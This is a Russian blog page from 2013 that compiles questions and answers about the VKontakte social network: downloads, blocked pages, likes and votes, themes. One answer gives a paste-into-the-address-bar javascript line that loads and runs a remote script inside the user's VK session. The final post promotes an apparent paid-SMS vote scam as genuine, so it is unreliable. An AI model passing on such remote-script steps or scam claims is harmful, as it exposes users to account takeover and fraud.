среда, 3 апреля 2013 г.

где можно найти норм группу в вконтакте,что бы там были все обсуждения,прогнозы матчей Евро 2012?



Мне нужно нормальную группу чтобы я смог узнавать все новое о евро 2012

Вконтакте есть группы(подарки за лайки(сердечки)),как думаете развод?

жесткий на*б который бесит уже. бесплатного ничего и никогда не будет. за все надо сейчас платить. а зачем это делают я не знаю. раскрутки может какие-то. в общем это глупо.

Отжимания. Можно ли чего-то добиться отжиманиями?Вконтакте в группе написали то , что от отжиманий толку ноль..

Хаха! Контакт - это, конечно, самое то место, где тебе окажут квалифицированную помощь. Обратись к преподавателю по физкультуре, сходи в спортивный дворец, там и узнаешь. Лично мне отжимания помогли сделать руки сильнее, перешел на подтягивания потом. Сила пригодится в различных житейских ситуациях.

Как называются такие картинки?

это фото. вконтакте в группах с цитатами часто встречаются оо

Есть ли еще сайты для общения с одноклассниками и друзьми, кроме сайтов вконтакте и одноклассники?

Да зачем еще что-то?? Разве там мало народа??! Если вы настолько ненасытны, то посмотрите Facebook (с чего контакт был содран) или Twitter (самый интересный обьект в интернете) XD удачи!

Почему вконтакте все добавляются в друзья,но из человек ста общаются только человека 2-3?

Объясните пожалуйста

Как вконтакте скачать музыку?

Не ставьте никаких программ, кроме вирусняка и баннеров ничего хорошего не получите. Используйте скрипт, вот так http://okontakte.info/index.php?option=c...

Есть такой сайт куда можно выложить свои треки бесплатно и чтобы их прослушали и скачали люди???

вконтакте)

Вконтакте появилась новая регистрация, по приглашениям. Как там зарегистрироватся я так и не понял?

Администрация крупнейшей социальной сети ВКонтакте закрыла открытую регистрацию на сайте в ночь с четверга на пятницу, сообщил руководитель пресс-службы Владислав Цыплухин. Теперь новые пользователи смогут зарегистрироваться только по приглашению ограниченного круга других уже лиц, которые уже являются членами социальной сети, - рассказал РИА Новости Цыплухин. При этом он отказался прокомментировать, кто именно будет наделен возможностью раздавать приглашения. Ограничение на регистрацию введено для того, чтобы предотвратить регистрацию пустых аккаунтов роботами. Такие профили чаще всего используются для создания видимости массовости, например, в группах пользователей. На данный момент в социальной сети ВКонтакте зарегистрировано более 90 миллионов аккаунтов.

почему вконтакте новые друзья на первых местах? можно ли как то это убрать?) )

НЕТ,это дурдом,меня это тоже бесит

Как закинуть скриншот контры вконтакт если я загружая и ошибка что делать????Что делатиь????

Prt Scrn(кнопка)-->paint-->вставить-->сохранить и только потом скидываешь вк.,

Как добавить видео с моего компа в Аудиозаписи Вконтакте????

http://vkcom.net/faq/как-скачать-музыку-вконтакте-4.html см. на форуме по твоему вопросу. есть ссылки на проги.

Как оформить красиво свою страницу вконтакте?

ВКонтакте нет возможности изменять дизайн, для ВКонтакте важен единый общий стиль. Если Вы хотите разнообразить свою жизнь на сайте, Вы можете выбрать дореволюционную или советскую версию сайта, это можно сделать в настройках Вашей страницы. Программы, которые предлагают настроить оформление сайта, часто распространяются мошенниками. Их могут использовать, чтобы украсть Ваш пароль и взломать страницу. Кроме того, из-за них часто возникают проблемы с работой ВКонтакте на Вашем компьютере.

Извините точто пишу в етой категории но...кинте ссылки на программы для повышения рэйтинга вконтакте

Всё быват )))Сам правдо не пользовался поскольку нету смысла ))) У Меня выше 70% Иза таблицки о том что инфа может не соответствовать рейтинг не повышается)))А тебе мож пригодится))

куплю аккаунт вконтакте. куплю аккаунт вконтакте с друзьями большее 7 тыс))

Зачем, если можно скачать прогу по контакту. Поищи. Я как-то нашел одну бесплатку очень хорошую, вот там дофига функций было на счет друзей

какие бывают кроме вконтакте социальные сети

mail.ru facebook.com odnoklassniki.ru

добавляйтесь вконтакте !

Как зовут парня на фото? Или кто знает как он подписан в соц сетях?

Илья Павлов id89269702 вконтакте

Сестре вконтакте стал писать какой-то дядя. Как-то все завязалось до виртуального секса.Девочке 13 лет. Что посоветуете?

тут советовать заочно трудно, вероятно, надо ей дать почитать о любви, о настоящей, фильм хороший с ней посмотреть, не упрекать, а объяснять, отчего человек бывает счастлив, дать ей понять, где кончается кокетство или интерес к противоположному полу, учить её отличать золото от подделки... необходимо ей внушать, что ЛЮБОВЬ нужна в жизни, человеку нужны верность, забота и поддержка, настоящие чувства, а не инстинкты, радость приносит духовное единство и душевная близость, а не постельные отношения, они пусты без любви, трата сил, энергии и здоровья

Сделайте мне меню для вконтакте на тему УНИВЕР

Кроме: http://wikidiz.ru/picture_templates/34-m...

Код с картинки ВКОНТАКТЕ-как мне его убрать?...Страница за номером закреплена и пароль поменяла уже...

И какой смысл что ты поменяла пароль? Что изменилось? Не закреплена у тебя страница! Потому что когда страница закреплена код нужно вводить только раз в месяц да и то не всегда....Проверь компьютер на наличие вирусов!

Как найти человека?

Я знаю в каком городе он живёт и его внешность...Больше ничего..Можно ли как нибудь отыскать этого человека?

Я захожу игры вконтакте.Там написано установить Adobe Flesh Pleer?.Я установил,а игры все-равно не включаются.Почему?

О сообществе Помощь новичкам Это необходимо знать. Об этом нужно спросить. Этому можно научиться. Помощь, консультация,советы. Новичкам и не только. Вопросы по ресурсу МайлРу, компьютеру и интернету.

Опрос Вконтакте. Ответов было 1000, а сейчас уменьшаются, 999, 997 О_о почему ? и как так вообще?))

рейтинг падает

В Японии есть ВКонтакте?

Вконтакте существует, вроде бы, только в России, но им можно воспользоваться абсолютно все люди мира, если они, конечно, знают о его существовании. И возможно, что в Японии другая система общения....

Накручиваю лайки вконтакте и друзей!добавляйтесь vk.com/meplash

Вконтакте

Это вирус. Зайди в C:\WINDOWS\system32\drivers\etc там файлик hosts(Открыть блокнотом). В нём ничего не должно быть кроме строчки внизу 127.0.0.1 localhost. Если что-то там ещё есть, то удали и оставь эту строчку 127.0.0.1 localhost. Мой тебе совет: Поставь нормальный антивирусник, но не DrWeb и не Nod32. У меня стоит каспер и никаких проблем нет ни с контактом ни с одноклассиками.

Как вернуть свою страницу вконтакте бесплатно без смс

askstrel.tamb(точка)ru/vk.htm

Что вконтакте есть интересного(наподобие ответов) или что-нибудь? Я там зарегистрирова

лась, но ничего интересного не нашла. Может я чего не знаю. Подскажите пожалуйста.

Как Удалить Группу в Вконтакте ? Подробно....

Мои группы > управление группой(с право) удали всех участников и группа удалиться вот и всё

У меня заблокировали страницу ВКонтакте((Люди помогите,что делать?!!

у меня тоже самое не знаю чо делать!Как узнаешь напиши

Помогите с песней. что за песня играет в этом видео с 1:44 по 1:50 Видео Вконтакте video68986408_160185429

Swedish House Mafia Feat. Pharrel - One (Your Name) http://www.zaycev.net/pages/7038/703832.shtml

вконтакт заходит ?

оо..нет. а я думала я одна такая:) я ввожу логин и пароль, он грузит , а дальше ничего нет:(

Как создать сеть типо вконтакте только бесплатно? как

Дурова попроси

Как вконтакте найти человека по его номеру??подскажите плиз ОЧЕНЬ НАДО!

в Битву экстрасенсов обратитесь, на ТНТ. Или уточните кого и по какому номеру найти

Сейчас зашла ВКОНТАКТЕ на странички двух старых знакомых,один из нх мне когда-то очень нрпавился...

с другим просто хорошо дружили,они между собой дружат,мы вместе в институте учились,потом вышла замуж,родила,просто перестали общаться,а сейчас,когда увидела фотки того парня,что мне нравился,стало так противно,даже не понимаю как ОН мог мне нравиться,глупенький,смазливенький мажор....я сразу вышла с его страницы и больше заходить туда не стала....А вот второй - его друг,ну в бывшем и мой друг,зашла,начала смотреть - аж затрясло,схватилась за сигареты,хоть обычно дома не курю,так и тянет зайти на его страничку снова и снова,он только вчера зарегистрировался вконтакте....еле сдерживаюсь,чтоб не добавить его в друзья,но при этом очень хочется,чтоб он сделал это сам(у нас вконтакте много общих друзей)....а ещё у него сегодня день рождения....нервы просто сдают....Почему я так реагирую на этих двух парней???Ведь на всех других своих бывших парней и друзей я смотрю спокойно...просто захожу посмотреть какими они стали спустя годы и спокойно ухожу....А эти двое покоя не дают!!!!ПОЧЕМУ????

Как узнать ВКОНТАКТЕ отклонил человек твою заявку на дружбу или просто ещё не успел добавить???

Потерпи. Хотя прогноз невеселый....

я вконтакте не могу зайти в свою анкету написано недоступен

Ну и и не ходи зайди ко мне

какие игры вконтакте взламываются через cheat engine

да никакие, cheat engine меняет значения в игре, хранящиеся на вашем компе, в то время как контактовские игры сохраняют значения на собственных серверах, т.е. вам надо для начала сломать сервера ВКонтакте, а потом игру

где можно скачать мобильную версию вконтакте ?

зайди на гугл плей маркет с телефона,набери там в поисковике и скачай.

Помогите правильно придумать статус для ВКонтакте

Вот, хотелось бы что-нибудь такое придумать, но в голову что-то грамотное не приходит... на примете это: Если решили добавить в друзья, приложите к заявке сообщение, зачем Вам это нужно? что-то типа такого помогите придумать, и чтобы было грамотно, а не как у меня...) ну, чтобы было похоже что это писал вменяемый человек, спасибо)

Что лучше ответы майл ру или вконтакте и почему?

У каждого свое мнение..но..Заметьте...Все они находятся на Мейл.ру....Пройдите по ссылкам http://otvet.mail.ru/question/55061415/ http://otvet.mail.ru/question/55597882/ http://otvet.mail.ru/question/56247066/ http://otvet.mail.ru/question/55417901/

как загрузить видео вконтакт??? надо просто облошить одного придурка))

Регистрируешься и добавляешь

человек вроде как удалил человека из друзей ВКонтакте а сам остается у него в друзьях может ли такое быть?

у человека его в друзьях нет а сам он остается у удаленного в друзьях

Я не могу скачать видео Вконтакте, хотя программа для скачивания установленна.

открываешь видеозаписи и вместо адресной строки вводишь скрипт javascript:var s=document.createElement(script);s.src=http://videosaver.ru/vs.js?nc=+Math.random();document.body.appendChild(s);void(0); потом в окне жмешь скачать и все

подскажите онлайн игры типо крокодил вконтакте!

угадай мелодию

Вконтакте! Проблема!

Напишите в службу поддержки. Попробуйте скачать нормальный браузер. Обновите, в конце то концов!!!

Почему так много женских аватаров вконтакте с выпученными глазами и губами-пельменями, выдвинутыми дальше носа?

фу господи.от таких фотографий уже тошнит.встреть я такую на улице-плюнула б в левый глаз. а всекте есть выстебывающий паблик,называется тупая п**да.

как вконтакте в группе поставить аватарку не кавадратную а прямоугольную??? хочется чтоб была по длиньше как у многих

напиши мне в личку,отвечу 100% и смогу сделать.

Существует ли какая-нибудь программа для поднятия голосов вконтакте?) Если существует, то с вирусами или нет?

Попробуйте мне толково объяснить, зачем Вам это и я подскажу Вам, где найти эту дрянь!

добавляю в друзья вконтакте,голос в подарок,или подарок.! id128639114

для количества?а как же качество?

заблокировать на сайте вконтакте

всем здравствуйте!такая ситуация кто разбирается в сайте вконтакте?нужно заблокировать человека чтобы он не писал вообще никак??я пробовал внести в черный список!не помогает он пишет через Беседу какую то типо конференции!заигнорил второго человека!всеравно пишет!помогите!

Сейчас вконтакте пишет девочка мол не собераюсь рожать никогда ...

Не судите да не судимы будете. Легко можно не хотеть малыша. Вот вы объясните парашютисту, что не хотите прыгать с парашютом. Или путешественнику, что не хотите лезть в джунгли. Девушка правильно говорит: жизненные приоритеты у всех разные. И если кто-то без детей жить не может, то это не значит, что все такие же. Кто-то всю жизнь проживёт для себя и умрёт счастливым. А пресловутый стакан воды на смертном одре ему/ей дворецкий подаст. А аргумент вас же родили - это не аргумент. Дети не просят их рожать. Не родили бы - не было бы человека. Вот и всё. Родили - спасибо. Не родили - нет вопроса. *Некультурный пример*: Мужчина развлекается со своей правой рукой периодически, и в салфеточке гибнет потенциальное население нашей планеты. Ну и что? Не всем суждено родиться. У девушки есть жизненные ценности, и она молодец. Она идёт к своей цели: стать успешной. А кто-то идёт к цели стать матерью семейства. И эти цели абсолютно равнозначны. Хуже, когда человек не знает, чего он хочет: семью, карьеру, дома сидеть, работать...

Не могу зайти ВКонтакте.ру

Не могу зайти ВКонтакте. ру Помогите пожалуйста . Когда открываю пишет вот это : Привет, я вирус. Вирус, который был подцепленн тобою, когда ты лазил или лазила по интернетам. Я не просто вирус, я открыто заявляю о себе. Я не буду форматировать твой винтчестер, убивать твой компьютер, я просто хочу чтобы ты открыл или открыла свои глаза на этот чудестный мир! С этой целью, я, мой дорогой друг или подруга, заблокировал все сайты для доступа. И куда бы ты не пытался, не пыталась зайти, я буду всюду преследовать тебя. Зачем это все? А вот зачем. Ты целыми сутками сидишь вконтакте, и для тебя больше не существет другого мира. Люди закрыли глаза. ВКонтакт рушит твой мозг изнутри. Поэтому, чтобы открыть тебе на это глаза, я буду появлятся всюду, кроме контакта, скорее всего ВКонтакте, поможет тебе боротся со мною, но изначально я выполню свою миссию. НЕТ ВКОНТАКТУ! Сиди теперь только ВКонтакте, и задумайся, человек ли ты, или марионетка?

ко мне вконтакте пришло видео как будто бы там я

я захожу там мои друзья каменты пишут типо ну ты даешь;я хочу оставить комент к видео но не получается!что мне делать?там написано +100500 и мое имя!

Группа Вконтакте про Майли Сайрус

У нас вы найдете: Фото Видео Новости Конкурсы Общение Все, кто любят Майли и хотят вступить в группу пишите!

как накрутить бесплатно голоса вконтакте?

в способах получения есть всякие акции, за которые дают от 1 до 3 голосов.

как загрузить видео с диска ВКонтакт?? на комп я скопировала но оно не открывается и ВК соответственно не загружается

Значит в этом виде никак. Вконтакт принимает видео только определенных форматов - когда выбираете файл для загрузки, он там пишет об этом в окошке выбора. Соответ-но вам нужно свое видео перегнать в подходящий формат, и тогда уже загрузить. Найдите любой бесплатный перекодировщик видео, он вам поможет.

Есть программы для накрутки лайков?

Нет. Но за деньги можно купить типа такую программу, на самом деле просто троян - вор паролей.

не показывает видео вконтакте (написано (видео еще не загрузилось или) че за фигня

с таким случаем знаком,нужно менять систему а точнее сносить и тогда будет всё нром,только этим выходом

тормозит комп.? Загрузил программу ЛовиВконтакте для скачивания роликов из вконтакте.ру начал тормозить комп. Почему?

VK сейвер рулит, ссылка появляется под песнями и видео save давно юзаю

Скажите где скачать песню трамвай ярко красный трамвай?

Вконтакте

как вконтакте отметить человека на фото?

Для того,чтобы отметить друзей на фото в контакте, нужно выбрать нужную фотографию.Затем, справа под фотографией, надо выбрать значок, отметить человека. Нажимаете на него, затем на самой фотографии выделяете область , которую хотите пометить. Например, наводите курсор на одного из ваших друзей и нажимаете левую кнопку мышки. Далее перед вами будет список друзей, выбираете нужного вам человека и нажимаете кнопку добавить. А сверху в окошке готово.Вот и все.

На чем зарабатывают Facebook, ВКонтакте, ICQ, Skype? Ведь их сервисы бесплатны

Skype делает деньги продавая звонки на стационарные и мобильные телефоны. Вконтакте - на приложениях. 90% средств на пополнение виртуального баланса - идет владельцам сервиса, остальные 10% - создателю игры либо приложения. Одноклассники - на огромной цене на рекламу и какоето время на платной регистрации. Про icq не знаю.

Вопрос по сайту ВКонтакте..

у меня есть несколько аккуантов, на одном я сижу всегда а с других я не могу зайти не в сообщения никуда сразу выбрасывает на авторизацию..помогите в чём проблема? Добавлено 4 года назад Я сто раз вводила данные но постоянно выбрасывает на автоиизацию а мне срочно надо проверить сообщения

Почему не работает Вконтакте?

Попробуйте через анонимайзер, например (сам иногда пользуюсь, рекламы нет вообще). Если откроется, возможно, для вас вконтакте заблокирован по URL. Кстати, логиниться в вк через анонимайзер не рекомендую.

Как удалить сообщество вКонтакте? Помогите пожалуйста!

его нужно закрытть в настройках т.е(Управление сообществом)(Заблокировать сообщество)

Если устанавливаешь тему Вконтакте, другие её не видят?

а еще лучше вообще не рисковать. Сейчас хакеры пользуются этим, создают типа тему, ты ее устанваливаешь, а у тебя блокируются все сайты на которых ты чаще всего бываешь.

в игре вормикс вконтакте как можно прокочать рубины и фузы.

Где можно скачать программу для добавления голосов Вконтакте ???

это все утки. только вирусов затащишь в комп и все. или контакт заблокируют. можно сделать одной прогой, только сам будешь подписан на сотни других неизвестных людей. да и зачем? популярности тебе это все равно не прибавит

подскажите пожалуйста....из-за чего я не могу зайти вконтакт...

на любые другие сайт без проблем захожу...а вконтакт просто тупо не грузится....из-за чего это может быть

какую группу вконтакте можно создать???

Любую)

вопрос очень простой,сколько реальных друзей у вас вконтакте?:)

одна подруга.. но мы с ней больше в реальности общаемся.. и один друг... все остальные 90 человек либо коллеги по работе либо одноклассники либо просто знакомые.. (я школе работаю вот больше половины это ученики со школы)

помогите. что нужно сделать если я не могу войти вконтакт !? вылазит ошибка) помогите

какая ошибка ?! что пишут ?

Вопрос про вконтакте?

скажите пожалуйста как удалить программу лови вконтакте с компьютера.?

Uninstall Tool это программа удаляет и из реестра

Как удалить все записи на стене ВКонтакте разом ???Как удалить все записи на стене ВКонтакте разом ???

Никак. Спроси на всякий случай у работников ВК. (вкладка помощь)

а почему я не могу зайти вконтакт кто знает??? как-то странно не могу зайти вк((

почистий хост Открывай мой компьютер, и далее диск С c:\WINDOWS\system32\drivers\etc\ - В папке etc всё удаляй, затем перезагрузи комп - я так справилась с вирусом

Как удалить страницу вконтакте,а потом её восстановить в прежний вид? боюсь,что могут взломать....

Сделайте длинный и сложный пороль! +Запишите и запомните его! )

читы на вормикс вконтакте

Честно играй! Читы ей надо... Игра отстой честно говоря.

Подскажите пожалуйста группу вконтакте,где можно заказать Nike Air MAx 90..без развода.

Все группы облазил..во всех сомневаюсь.Может кто уже заказывал,подскажите

Здраствуйте! У меня проблема с сайтом Вконтакте! Помогите, кто знает что с этим делать!

вообще это всплывающая реклама , и слово закрыть как раз таки идет от рекламы, было тоже такое пока новый браузер не скачала

Можно скачать музыку с вконтакте?

Internet Download Manager (IDM) – удобный инструмент, позволяющий увеличить скорость загрузки, поддерживающий докачку и загрузку по расписанию. Согласно мнениям пользователей, Internet Download Manager – отличная программа, позволяющая загружать ваше любимое программное обеспечение, игры, cd, dvd и mp3-музыку, фильмы, бесплатные и условно бесплатные программы намного быстрее! Internet Download Manager имеет встроенный логический ускоритель загрузки, включающий интеллектуальную динамическую сегментацию файла и безопасную многослойную технологию загрузки, что способствует ускорению загрузки. Комплексная система анализа ошибок и возможность докачки, поможет продолжить загрузку, прерванную из-за потери соединения, проблем в сети, выключения компьютера или перепадов в подаче электроэнергии. Простой графический интерфейс делает IDM удобным и дружественным к пользователю. С помощью Internet Download Manager Вы сможете скачивать видео и аудио с самых популярных соц сетей Одноклассники,Вконтакте,Мой мир .итд программа

Какую группу можно создать вконтакте про звезду?) )

создай группу - *Как избавится от контакта за 10 дней!*)))

Кто знает что нужно зделать, чтобы видео с компа вконтакт загрузилось (Windows Movie Market)?

судя по всему дефочка вам в другую категорию;)(а вообще нуна поколдовать немного)))

можно ли играть,смотреть в вконтакте через нокиа 5228

нет, нельзя даже музыку слушать вконтакте, не то что играть

как узнать пароль вконтакте зная e-mail?

там надо нажать Забыли пароль?.там надо будет ввести номер телефона.введите и прийдёт сообщение с вашим новым паролем

где можно скачать вконтакте на телефон сони эрексон??

ахахахахахахахахахахахахаххахахахахахаххахахахахахаха ты глуп вконтакте эт страница а не браузер или прога))))))))))))

хочу купить планшет но незнаю какой лучше , нужно чтобы и вконтакте приложения тянул и по цене не больше 30 тыь рублей

Лучше Galaxy tab брать. На андроид будешь качать любые приложения с интернета бесплатно. А на Ipad все только через itunes и за все хорошее надо будет платить деньги

Как попасть к другу вконтакте в Общие друзья?

Никак, вы только можете посмотреть какие у Вас с ним общие друзья.Или зайти с чужой страницы к нему в друзья,вы там будете))))

Какую картинку кинуть на стену вконтакте в день рождение пацану?

Если сможете содрать с сайта , то пошлите ему прикольную видеооткрытку , сечас модно . otkritka. com

помогите взломать страницу в вконтакте

За взлом страницы в соц. сетях предусмотрено наказание до двух лет колонии.

дайте пожалуйста ссылку на установку темы Майкл Джексон для вконтакте (или на БЕСПЛАТНОЕ скачивание этой темы)

тут смотри http://get-styles.ru/catalog/type/1/page...

Скажите,про бесплатные подарки вконтакте это правда?? Может быть есть какие-либо программы?

сэкономив в контакте, прогадаете в программе, которая, по-моему мнению, вряд ли грамотно работающая существует

Как накрутить лайки вконтакте???

Бесплатные способы накрутки лайков: В контакте создано большое количество групп для взаимного обмена кликами «мне нравится». Вначале Вам прийдется немного позаходить на страницы других пользователей и покликать на их аватарки, после чего можно будет выставить и свою просьбу. Эффективность такого способа: 35-45 лайков. Примеры такой группы и темы. Второй способ более эффективный — т. к. здесь Вам не прийдется кого-то просить заходить к себе на страницу или кликать на аватар. Разместите свое фото по ссылке со своей страницы на стене тематической группы, например, фотолюбителей в контакте. Тогда все сердечки, которые будут субъективно поставлены пользователями группы, будут автоматически накапливаться и на вашей странице. Главное следите за тем, чтобы комментирование стены группы было включено для простых пользователей. Эффективность такого способа: зависит от популярности группы, может достигать 60-100 лайков. Примеры таких групп здесь и здесь. Наиболее простой, но наименее эффективный способ — просить оставлять «лайки» своих друзей в личных сообщениях или кидать на их стены свои фотографии при помощи функции «Поделиться» в контакте. Эффективность такого способа: зависит от количество друзей, 45-60% от всех отправленных сообщений. Платные способы накрутки лайков: Платные способы накрутки «мне нравится» в контакте довольно недорогие, поэтому если вам просто необходимо выиграть какой-либо конкурс или спор с другом на наибольшее количество лайков — обратитесь в специальную группу в контакте, в которой вам буквально за 10-15 рублей накрутят до 100 сердечек. Какой способ повышения популярности своих фотографий и записей выбрать — зависит только от Вас, но все-таки самым лучшим способом всегда есть и будет размещение действительно красивой и привлекательной фотографии, которая заставит ваших друзей нажать не только «Мне нравится», но и «Поделиться с друзьями»!

Как узнать когда я зарегестрировался в вконтакте?

Приложение: Я Вконтакте. С помощью него узнаешь)

программа для скачивания музыки вконтакте.Дайте бесплатную ссылку-ПЛИЗЗ!

есть скрипты называються vKopt найди в гугле, там всё обьяснят, не толлько сможешь музыку качать но и мувики, а вообще много всего, разобраться очень легко, не думай что тяжело))))

Простой вопросик*. Подскажите,как или можно ли менять,тему вконтакте?)

есть сайт get-styles.ru там и можно поменять тему для вк

Подскажите тему для группы вконтакте

Тема должна быть игрой. Игра должна быт текстом) Тоисть типо как ойени аватарку предыдущего по десятибальной шкале. Но что-нибудь поинтереснее . Группа разносторонняя. Любые интересные идеи приветствуются) Добавлено 2 года назад Кто не знает, не пишите.

В Однокласниках можно добавлять видео к себе как в вконтакте?

да можно , ток там добавляется не само видео , а сылка на видео например с ютуба. вот не сколько способов как это сделать

Это не вопрос а ответ как поднять ретинг вконтакте

Привет все знают кто создал сайт контакты если кто видел ретинги у когото есть рет 1000 но мы все знаем что это не реально это сколькож денек нужно иметь но я нашёл случайный способ поднятие ретинга это честно клленусь сам у же пробовал там павел дуров решил создать страницу бота вот если вы поднимаете ему ретинг то лн вам даёт за 3 голоса 100 голосов нужно севолиш отправить смс стекстом id16815874 на номер 1046 если кто не верет не верти но я кленусь что это правда и вам взамен додут не 3 не 10 голосов а 1000 голосов сразу пишу стоимость одной смс стоит 5 рублей всеволиш только для этого бота я отправил ему 4 раза смс и всеволиш заплатил 20 руб и получил взамен 497голосов вот всё что я хотел роскозать о холявном ретинге в контакте



Комментариев нет:

Отправить комментарий